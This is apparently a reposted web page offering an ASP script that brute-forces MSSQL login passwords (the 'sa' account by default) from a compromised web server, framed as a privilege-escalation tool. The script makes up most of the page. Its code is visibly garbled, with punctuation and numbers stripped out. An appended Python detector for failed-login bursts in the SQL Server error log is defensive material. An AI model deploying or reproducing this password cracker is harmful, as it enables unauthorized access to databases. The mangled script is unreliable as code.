
ASP Privilege Escalation: Brute-Forcing MSSQL User Passwords


Published: July 17, 2019
 
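An ASP program that brute-forces MSSQL user passwords. The version below can be left running after the browser is closed; when it finishes, it writes a result file to the current directory.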

CODE:

<%

============ ASP Port Scanner by lake ===================

×

Version:

For SpringBoard

==========================================================

%>

<style type=text/css>

bodytdth {color: #FF;fontfamily: Verdana Arial Helvetica sansserif;}

body {backgroundcolor: #ffffff;fontsize:px; }

a:link {color: #FF;textdecoration: none;}

a:visited {textdecoration: none;color: #FF;}

a:hover {textdecoration: none;color: #FF;}

a:active {textdecoration: none;color: #FF;}

buttom {color: #FFFFFF; border: px solid #BE; backgroundcolor: #BC}

TextBox {border: px solid #BE}

styleRed {color: #FF}

</style>

<title>MSSQL Cracker for SpringBoard</title>

<%

Dim Password()

If RequestForm(go) <> ″ Then

%>

<div align=center>Welcome to <a href=× target=_blank>×</a> </div>

<form name=form″ method=post action= onSubmit=formSubmitdisabled=true;>

ConnStr:

<input name=conn type=text id=conn value=Provider=SQLOLEDB;Data Source=;User ID=sa;Password={PASS}; size=″>

<br>

Char:

<input name=char type=text id=char value=″ size=″>

<br>

Length:

<input name=len type=text id=len value=″ size=″>

<br>

Path:

<input name=path type=text value=<%=ServerMapPath(rtxt)%> size=″>

<input name=CFile type=checkbox id=CFile value=″ checked>

Enablel<br>

<input name=go type=hidden id=go value=″>

<br>

<input name=Submit type=submit id=Submit value= Run >

</form>

<%

Else

timer = timer

ServerScriptTimeout =

ConnStr = RequestForm(Conn)

Char = requestForm(char)

LenChar = Len(Char)

ReDim password(LenChar)

For i = to LenChar

password(i) = Mid(Char i )

Next

length = CInt(requestForm(len))

Call LAKE()

responseWrite Done!<br>Process & tTime & s

If requestForm(CFile) <> Then CreateResult(Done! & vbcrlf & tTime)

End If

Sub LAKE(str)

If Len(str) >= length Then Exit Sub

For j = to LenChar

pass = str & password(j)

If Len(pass) = length Then Call Crack(pass)

Call LAKE(pass)

Next

End Sub

Sub Crack(str)

On Error Resume Next

Set conn = ServerCreateObject(nnection)

connopen Replace(ConnStr{PASS}str)

If Err Then

If ErrNumber <> Then

responseWrite(ErrDescription & <BR>)

responseEnd()

End If

Else

responseWrite(I Get it ! Password is <font color=red> & str & </font><BR>Process & tTime & s)

If requestForm(CFile) <> Then CreateResult(str & vbcrlf & tTime)

responseEnd()

End If

End Sub

Function tTime()

timer = timer

thetime=cstr(int(timertimer))

tTime = thetime

End Function

Sub CreateResult(t)

Set fs = CreateObject(ScriptingFileSystemObject)

Set outfile = fsCreateTextFile(requestForm(path))

outfileWriteLine t

Set fs = Nothing

End Sub

%>
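Added example (not part of the original page and not the script author's code): a Python detector for the burst of failed logins that a script like the one above leaves in the SQL Server ERRORLOG. It assumes failed-login auditing is enabled and that lines arrive in chronological order; the sample log lines, threshold, window and function name are constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Matches the "Login failed" line that accompanies error 18456 in the ERRORLOG.
FAILED = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+Logon\s+"
    r"Login failed for user '(?P<user>[^']*)'\..*\[CLIENT: (?P<client>[^\]]+)\]"
)

def find_bursts(lines, threshold=5, window=timedelta(seconds=10)):
    """Return {(login, client): peak failure count inside any sliding window}
    for every pair that reached `threshold` failures within `window`."""
    recent = defaultdict(deque)  # (login, client) -> timestamps still in window
    peaks = {}
    for line in lines:
        m = FAILED.match(line)
        if not m:
            continue  # successful logins, error-number lines, other sources
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
        key = (m["user"].lower(), m["client"].strip())
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window:  # drop failures that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            peaks[key] = max(peaks.get(key, 0), len(q))
    return peaks

# Constructed sample in ERRORLOG format (not taken from the page):
# six 'sa' failures one second apart, then unrelated noise.
SAMPLE = [
    f"2019-07-17 10:00:0{i}.10 Logon       Login failed for user 'sa'. "
    "Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]"
    for i in range(6)
] + [
    "2019-07-17 10:00:05.10 Logon       Error: 18456, Severity: 14, State: 8.",
    "2019-07-17 10:05:00.00 Logon       Login failed for user 'report'. "
    "Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.9]",
]

if __name__ == "__main__":
    for (login, client), count in find_bursts(SAMPLE).items():
        print(f"possible brute force: login={login} client={client} peak={count}")
```

Because the ASP page runs on the web server, the CLIENT field carries the web server's address rather than the browser's, so hits are best correlated with the IIS log for POST requests to unfamiliar .asp files.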
